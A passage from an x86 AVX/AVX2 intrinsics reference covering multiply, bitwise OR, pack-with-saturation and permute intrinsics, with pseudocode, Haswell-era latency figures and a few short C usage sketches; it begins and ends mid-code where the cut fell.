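    __m256i p  = _mm256_mul_epi32(va, vb);                /* a[0]*b[0], a[2]*b[2], a[4]*b[4], a[6]*b[6] */
    _mm256_storeu_si256((__m256i *)out, p);
}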
vpmuludq
__m256i _mm256_mul_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mul_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmuludq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the low unsigned 32-bit integers from each packed 64-bit element in a and b, and store the unsigned 64-bit results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vmulpd
__m256d _mm256_mul_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_mul_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vmulpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Multiply packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] * b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 0.5
Ivy Bridge 5 1
Sandy Bridge 5 1
vmulps
__m256 _mm256_mul_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_mul_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vmulps ymm, ymm, ymm
CPUID Flags: AVX

Description

Multiply packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 0.5
Ivy Bridge 5 1
Sandy Bridge 5 1
vpmulhw
__m256i _mm256_mulhi_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhi_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 16-bit integers in a and b, producing intermediate 32-bit integers, and store the high 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[31:16] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmulhuw
__m256i _mm256_mulhi_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhi_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed unsigned 16-bit integers in a and b, producing intermediate 32-bit integers, and store the high 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[31:16] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
vpmulhrsw
__m256i _mm256_mulhrs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mulhrs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulhrsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply packed 16-bit integers in a and b, producing intermediate signed 32-bit integers. Truncate each intermediate integer to the 18 most significant bits, round by adding 1, and store bits [16:1] to dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := ((a[i+15:i] * b[i+15:i]) >> 14) + 1 dst[i+15:i] := tmp[16:1] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
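
The "truncate to 18 bits, add 1, keep bits [16:1]" wording describes a rounded Q15 fixed-point multiply: the result is round(a*b / 2^15). A minimal sketch under that interpretation, assuming AVX2:

#include <immintrin.h>

/* Rounded Q15 multiply of 16 packed fixed-point values.
   Note the usual fixed-point caveat: (-1.0) * (-1.0) overflows to -1.0. */
__m256i q15_mul(__m256i a, __m256i b)
{
    return _mm256_mulhrs_epi16(a, b);
}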
vpmullw
__m256i _mm256_mullo_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mullo_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmullw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 16-bit integers in a and b, producing intermediate 32-bit integers, and store the low 16 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 15 i := j*16 tmp[31:0] := a[i+15:i] * b[i+15:i] dst[i+15:i] := tmp[15:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmulld
__m256i _mm256_mullo_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mullo_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmulld ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the packed 32-bit integers in a and b, producing intermediate 64-bit integers, and store the low 32 bits of the intermediate integers in dst.

Operation

FOR j := 0 to 7 i := j*32 tmp[63:0] := a[i+31:i] * b[i+31:i] dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 10 1
vorpd
__m256d _mm256_or_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_or_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise OR of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] BITWISE OR b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vorps
__m256 _mm256_or_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_or_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise OR of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] BITWISE OR b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpor
__m256i _mm256_or_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_or_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpor ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise OR of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] OR b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vpacksswb
__m256i _mm256_packs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpacksswb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 16-bit integers from a and b to packed 8-bit integers using signed saturation, and store the results in dst.

Operation

dst[7:0] := Saturate_Int16_To_Int8 (a[15:0]) dst[15:8] := Saturate_Int16_To_Int8 (a[31:16]) dst[23:16] := Saturate_Int16_To_Int8 (a[47:32]) dst[31:24] := Saturate_Int16_To_Int8 (a[63:48]) dst[39:32] := Saturate_Int16_To_Int8 (a[79:64]) dst[47:40] := Saturate_Int16_To_Int8 (a[95:80]) dst[55:48] := Saturate_Int16_To_Int8 (a[111:96]) dst[63:56] := Saturate_Int16_To_Int8 (a[127:112]) dst[71:64] := Saturate_Int16_To_Int8 (b[15:0]) dst[79:72] := Saturate_Int16_To_Int8 (b[31:16]) dst[87:80] := Saturate_Int16_To_Int8 (b[47:32]) dst[95:88] := Saturate_Int16_To_Int8 (b[63:48]) dst[103:96] := Saturate_Int16_To_Int8 (b[79:64]) dst[111:104] := Saturate_Int16_To_Int8 (b[95:80]) dst[119:112] := Saturate_Int16_To_Int8 (b[111:96]) dst[127:120] := Saturate_Int16_To_Int8 (b[127:112]) dst[135:128] := Saturate_Int16_To_Int8 (a[143:128]) dst[143:136] := Saturate_Int16_To_Int8 (a[159:144]) dst[151:144] := Saturate_Int16_To_Int8 (a[175:160]) dst[159:152] := Saturate_Int16_To_Int8 (a[191:176]) dst[167:160] := Saturate_Int16_To_Int8 (a[207:192]) dst[175:168] := Saturate_Int16_To_Int8 (a[223:208]) dst[183:176] := Saturate_Int16_To_Int8 (a[239:224]) dst[191:184] := Saturate_Int16_To_Int8 (a[255:240]) dst[199:192] := Saturate_Int16_To_Int8 (b[143:128]) dst[207:200] := Saturate_Int16_To_Int8 (b[159:144]) dst[215:208] := Saturate_Int16_To_Int8 (b[175:160]) dst[223:216] := Saturate_Int16_To_Int8 (b[191:176]) dst[231:224] := Saturate_Int16_To_Int8 (b[207:192]) dst[239:232] := Saturate_Int16_To_Int8 (b[223:208]) dst[247:240] := Saturate_Int16_To_Int8 (b[239:224]) dst[255:248] := Saturate_Int16_To_Int8 (b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
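
Worth noting from the Operation above: the 256-bit pack interleaves per 128-bit lane, giving the qword order a[0..7], b[0..7], a[8..15], b[8..15]. The sketch below restores linear order with _mm256_permute4x64_epi64 (documented further below); imm8 = 0xD8 selects qwords 0, 2, 1, 3. Assumes AVX2.

#include <immintrin.h>

__m256i pack16_to8_ordered(__m256i a, __m256i b)
{
    __m256i packed = _mm256_packs_epi16(a, b);        /* lane-interleaved 8-bit results */
    return _mm256_permute4x64_epi64(packed, 0xD8);    /* reorder qwords to a0..a15, b0..b15 */
}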
vpackssdw
__m256i _mm256_packs_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packs_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackssdw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 32-bit integers from a and b to packed 16-bit integers using signed saturation, and store the results in dst.

Operation

dst[15:0] := Saturate_Int32_To_Int16 (a[31:0]) dst[31:16] := Saturate_Int32_To_Int16 (a[63:32]) dst[47:32] := Saturate_Int32_To_Int16 (a[95:64]) dst[63:48] := Saturate_Int32_To_Int16 (a[127:96]) dst[79:64] := Saturate_Int32_To_Int16 (b[31:0]) dst[95:80] := Saturate_Int32_To_Int16 (b[63:32]) dst[111:96] := Saturate_Int32_To_Int16 (b[95:64]) dst[127:112] := Saturate_Int32_To_Int16 (b[127:96]) dst[143:128] := Saturate_Int32_To_Int16 (a[159:128]) dst[159:144] := Saturate_Int32_To_Int16 (a[191:160]) dst[175:160] := Saturate_Int32_To_Int16 (a[223:192]) dst[191:176] := Saturate_Int32_To_Int16 (a[255:224]) dst[207:192] := Saturate_Int32_To_Int16 (b[159:128]) dst[223:208] := Saturate_Int32_To_Int16 (b[191:160]) dst[239:224] := Saturate_Int32_To_Int16 (b[223:192]) dst[255:240] := Saturate_Int32_To_Int16 (b[255:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpackuswb
__m256i _mm256_packus_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packus_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackuswb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 16-bit integers from a and b to packed 8-bit integers using unsigned saturation, and store the results in dst.

Operation

dst[7:0] := Saturate_Int16_To_UnsignedInt8 (a[15:0]) dst[15:8] := Saturate_Int16_To_UnsignedInt8 (a[31:16]) dst[23:16] := Saturate_Int16_To_UnsignedInt8 (a[47:32]) dst[31:24] := Saturate_Int16_To_UnsignedInt8 (a[63:48]) dst[39:32] := Saturate_Int16_To_UnsignedInt8 (a[79:64]) dst[47:40] := Saturate_Int16_To_UnsignedInt8 (a[95:80]) dst[55:48] := Saturate_Int16_To_UnsignedInt8 (a[111:96]) dst[63:56] := Saturate_Int16_To_UnsignedInt8 (a[127:112]) dst[71:64] := Saturate_Int16_To_UnsignedInt8 (b[15:0]) dst[79:72] := Saturate_Int16_To_UnsignedInt8 (b[31:16]) dst[87:80] := Saturate_Int16_To_UnsignedInt8 (b[47:32]) dst[95:88] := Saturate_Int16_To_UnsignedInt8 (b[63:48]) dst[103:96] := Saturate_Int16_To_UnsignedInt8 (b[79:64]) dst[111:104] := Saturate_Int16_To_UnsignedInt8 (b[95:80]) dst[119:112] := Saturate_Int16_To_UnsignedInt8 (b[111:96]) dst[127:120] := Saturate_Int16_To_UnsignedInt8 (b[127:112]) dst[135:128] := Saturate_Int16_To_UnsignedInt8 (a[143:128]) dst[143:136] := Saturate_Int16_To_UnsignedInt8 (a[159:144]) dst[151:144] := Saturate_Int16_To_UnsignedInt8 (a[175:160]) dst[159:152] := Saturate_Int16_To_UnsignedInt8 (a[191:176]) dst[167:160] := Saturate_Int16_To_UnsignedInt8 (a[207:192]) dst[175:168] := Saturate_Int16_To_UnsignedInt8 (a[223:208]) dst[183:176] := Saturate_Int16_To_UnsignedInt8 (a[239:224]) dst[191:184] := Saturate_Int16_To_UnsignedInt8 (a[255:240]) dst[199:192] := Saturate_Int16_To_UnsignedInt8 (b[143:128]) dst[207:200] := Saturate_Int16_To_UnsignedInt8 (b[159:144]) dst[215:208] := Saturate_Int16_To_UnsignedInt8 (b[175:160]) dst[223:216] := Saturate_Int16_To_UnsignedInt8 (b[191:176]) dst[231:224] := Saturate_Int16_To_UnsignedInt8 (b[207:192]) dst[239:232] := Saturate_Int16_To_UnsignedInt8 (b[223:208]) dst[247:240] := Saturate_Int16_To_UnsignedInt8 (b[239:224]) dst[255:248] := Saturate_Int16_To_UnsignedInt8 (b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpackusdw
__m256i _mm256_packus_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_packus_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpackusdw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Convert packed 32-bit integers from a and b to packed 16-bit integers using unsigned saturation, and store the results in dst.

Operation

dst[15:0] := Saturate_Int32_To_UnsignedInt16 (a[31:0]) dst[31:16] := Saturate_Int32_To_UnsignedInt16 (a[63:32]) dst[47:32] := Saturate_Int32_To_UnsignedInt16 (a[95:64]) dst[63:48] := Saturate_Int32_To_UnsignedInt16 (a[127:96]) dst[79:64] := Saturate_Int32_To_UnsignedInt16 (b[31:0]) dst[95:80] := Saturate_Int32_To_UnsignedInt16 (b[63:32]) dst[111:96] := Saturate_Int32_To_UnsignedInt16 (b[95:64]) dst[127:112] := Saturate_Int32_To_UnsignedInt16 (b[127:96]) dst[143:128] := Saturate_Int32_To_UnsignedInt16 (a[159:128]) dst[159:144] := Saturate_Int32_To_UnsignedInt16 (a[191:160]) dst[175:160] := Saturate_Int32_To_UnsignedInt16 (a[223:192]) dst[191:176] := Saturate_Int32_To_UnsignedInt16 (a[255:224]) dst[207:192] := Saturate_Int32_To_UnsignedInt16 (b[159:128]) dst[223:208] := Saturate_Int32_To_UnsignedInt16 (b[191:160]) dst[239:224] := Saturate_Int32_To_UnsignedInt16 (b[223:192]) dst[255:240] := Saturate_Int32_To_UnsignedInt16 (b[255:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpermilpd
__m128d _mm_permute_pd (__m128d a, int imm8)

Synopsis

__m128d _mm_permute_pd (__m128d a, int imm8)
#include «immintrin.h»
Instruction: vpermilpd xmm, xmm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a using the control in imm8, and store the results in dst.

Operation

IF (imm8[0] == 0) dst[63:0] := a[63:0] IF (imm8[0] == 1) dst[63:0] := a[127:64] IF (imm8[1] == 0) dst[127:64] := a[63:0] IF (imm8[1] == 1) dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilpd
__m256d _mm256_permute_pd (__m256d a, int imm8)

Synopsis

__m256d _mm256_permute_pd (__m256d a, int imm8)
#include «immintrin.h»
Instruction: vpermilpd ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

IF (imm8[0] == 0) dst[63:0] := a[63:0] IF (imm8[0] == 1) dst[63:0] := a[127:64] IF (imm8[1] == 0) dst[127:64] := a[63:0] IF (imm8[1] == 1) dst[127:64] := a[127:64] IF (imm8[2] == 0) dst[191:128] := a[191:128] IF (imm8[2] == 1) dst[191:128] := a[255:192] IF (imm8[3] == 0) dst[255:192] := a[191:128] IF (imm8[3] == 1) dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m128 _mm_permute_ps (__m128 a, int imm8)

Synopsis

__m128 _mm_permute_ps (__m128 a, int imm8)
#include «immintrin.h»
Instruction: vpermilps xmm, xmm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m256 _mm256_permute_ps (__m256 a, int imm8)

Synopsis

__m256 _mm256_permute_ps (__m256 a, int imm8)
#include «immintrin.h»
Instruction: vpermilps ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(a[255:128], imm8[5:4]) dst[255:224] := SELECT4(a[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
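
A minimal sketch of the immediate form: broadcast element 0 of each 128-bit lane across that lane. _MM_SHUFFLE(d,c,b,a) builds the imm8; here all four two-bit selectors are 0. Assumes AVX; the function name is illustrative.

#include <immintrin.h>

__m256 bcast_lane_elem0(__m256 v)
{
    /* result = {v0,v0,v0,v0, v4,v4,v4,v4}; vpermilps cannot cross the lane boundary */
    return _mm256_permute_ps(v, _MM_SHUFFLE(0, 0, 0, 0));
}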
vperm2f128
__m256d _mm256_permute2f128_pd (__m256d a, __m256d b, int imm8)

Synopsis

__m256d _mm256_permute2f128_pd (__m256d a, __m256d b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of 2 packed double-precision (64-bit) floating-point elements) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2f128
__m256 _mm256_permute2f128_ps (__m256 a, __m256 b, int imm8)

Synopsis

__m256 _mm256_permute2f128_ps (__m256 a, __m256 b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of 4 packed single-precision (32-bit) floating-point elements) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2f128
__m256i _mm256_permute2f128_si256 (__m256i a, __m256i b, int imm8)

Synopsis

__m256i _mm256_permute2f128_si256 (__m256i a, __m256i b, int imm8)
#include «immintrin.h»
Instruction: vperm2f128 ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle 128-bits (composed of integer data) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vperm2i128
__m256i _mm256_permute2x128_si256 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_permute2x128_si256 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vperm2i128 ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 128-bits (composed of integer data) selected by imm8 from a and b, and store the results in dst.

Operation

SELECT4(src1, src2, control){ CASE(control[1:0]) 0: tmp[127:0] := src1[127:0] 1: tmp[127:0] := src1[255:128] 2: tmp[127:0] := src2[127:0] 3: tmp[127:0] := src2[255:128] ESAC IF control[3] tmp[127:0] := 0 FI RETURN tmp[127:0] } dst[127:0] := SELECT4(a[255:0], b[255:0], imm8[3:0]) dst[255:128] := SELECT4(a[255:0], b[255:0], imm8[7:4]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
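
A minimal sketch: swapping the two 128-bit halves of a vector with vperm2i128. imm8 = 0x01 places a's high lane in the low half of dst and a's low lane in the high half. Assumes AVX2.

#include <immintrin.h>

__m256i swap_halves(__m256i a)
{
    return _mm256_permute2x128_si256(a, a, 0x01);   /* {hi, lo} -> {lo, hi} swapped */
}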
vpermq
__m256i _mm256_permute4x64_epi64 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_permute4x64_epi64 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpermq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 64-bit integers in a across lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[63:0] := src[63:0] 1: tmp[63:0] := src[127:64] 2: tmp[63:0] := src[191:128] 3: tmp[63:0] := src[255:192] ESAC RETURN tmp[63:0] } dst[63:0] := SELECT4(a[255:0], imm8[1:0]) dst[127:64] := SELECT4(a[255:0], imm8[3:2]) dst[191:128] := SELECT4(a[255:0], imm8[5:4]) dst[255:192] := SELECT4(a[255:0], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpermpd
__m256d _mm256_permute4x64_pd (__m256d a, const int imm8)

Synopsis

__m256d _mm256_permute4x64_pd (__m256d a, const int imm8)
#include «immintrin.h»
Instruction: vpermpd ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle double-precision (64-bit) floating-point elements in a across lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[63:0] := src[63:0] 1: tmp[63:0] := src[127:64] 2: tmp[63:0] := src[191:128] 3: tmp[63:0] := src[255:192] ESAC RETURN tmp[63:0] } dst[63:0] := SELECT4(a[255:0], imm8[1:0]) dst[127:64] := SELECT4(a[255:0], imm8[3:2]) dst[191:128] := SELECT4(a[255:0], imm8[5:4]) dst[255:192] := SELECT4(a[255:0], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
vpermilpd
__m128d _mm_permutevar_pd (__m128d a, __m128i b)

Synopsis

__m128d _mm_permutevar_pd (__m128d a, __m128i b)
#include «immintrin.h»
Instruction: vpermilpd xmm, xmm, xmm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a using the control in b, and store the results in dst.

Operation

IF (b[1] == 0) dst[63:0] := a[63:0] IF (b[1] == 1) dst[63:0] := a[127:64] IF (b[65] == 0) dst[127:64] := a[63:0] IF (b[65] == 1) dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilpd
__m256d _mm256_permutevar_pd (__m256d a, __m256i b)

Synopsis

__m256d _mm256_permutevar_pd (__m256d a, __m256i b)
#include «immintrin.h»
Instruction: vpermilpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a within 128-bit lanes using the control in b, and store the results in dst.

Operation

IF (b[1] == 0) dst[63:0] := a[63:0] IF (b[1] == 1) dst[63:0] := a[127:64] IF (b[65] == 0) dst[127:64] := a[63:0] IF (b[65] == 1) dst[127:64] := a[127:64] IF (b[129] == 0) dst[191:128] := a[191:128] IF (b[129] == 1) dst[191:128] := a[255:192] IF (b[193] == 0) dst[255:192] := a[191:128] IF (b[193] == 1) dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpermilps
__m128 _mm_permutevar_ps (__m128 a, __m128i b)

Synopsis

__m128 _mm_permutevar_ps (__m128 a, __m128i b)
#include «immintrin.h»
Instruction: vpermilps xmm, xmm, xmm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a using the control in b, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], b[1:0]) dst[63:32] := SELECT4(a[127:0], b[33:32]) dst[95:64] := SELECT4(a[127:0], b[65:64]) dst[127:96] := SELECT4(a[127:0], b[97:96]) dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m256 _mm256_permutevar_ps (__m256 a, __m256i b)

Synopsis

__m256 _mm256_permutevar_ps (__m256 a, __m256i b)
#include «immintrin.h»
Instruction: vpermilps ymm, ymm, ymm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in b, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], b[1:0]) dst[63:32] := SELECT4(a[127:0], b[33:32]) dst[95:64] := SELECT4(a[127:0], b[65:64]) dst[127:96] := SELECT4(a[127:0], b[97:96]) dst[159:128] := SELECT4(a[255:128], b[129:128]) dst[191:160] := SELECT4(a[255:128], b[161:160]) dst[223:192] := SELECT4(a[255:128], b[193:192]) dst[255:224] := SELECT4(a[255:128], b[225:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpermd
__m256i _mm256_permutevar8x32_epi32 (__m256i a, __m256i idx)

Synopsis

__m256i _mm256_permutevar8x32_epi32 (__m256i a, __m256i idx)
#include «immintrin.h»
Instruction: vpermd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle 32-bit integers in a across lanes using the corresponding index in idx, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 id := idx[i+2:i]*32 dst[i+31:i] := a[id+31:id] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpermps
__m256 _mm256_permutevar8x32_ps (__m256 a, __m256i idx)

Synopsis

__m256 _mm256_permutevar8x32_ps (__m256 a, __m256i idx)
#include «immintrin.h»
Instruction: vpermps ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle single-precision (32-bit) floating-point elements in a across lanes using the corresponding index in idx, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 id := idx[i+2:i]*32 dst[i+31:i] := a[id+31:id] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
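
Unlike vpermilps, vpermps can move elements across the 128-bit lane boundary. A minimal sketch that reverses the 8 floats of a vector, assuming AVX2:

#include <immintrin.h>

__m256 reverse8(__m256 v)
{
    __m256i idx = _mm256_setr_epi32(7, 6, 5, 4, 3, 2, 1, 0);  /* source index per destination lane */
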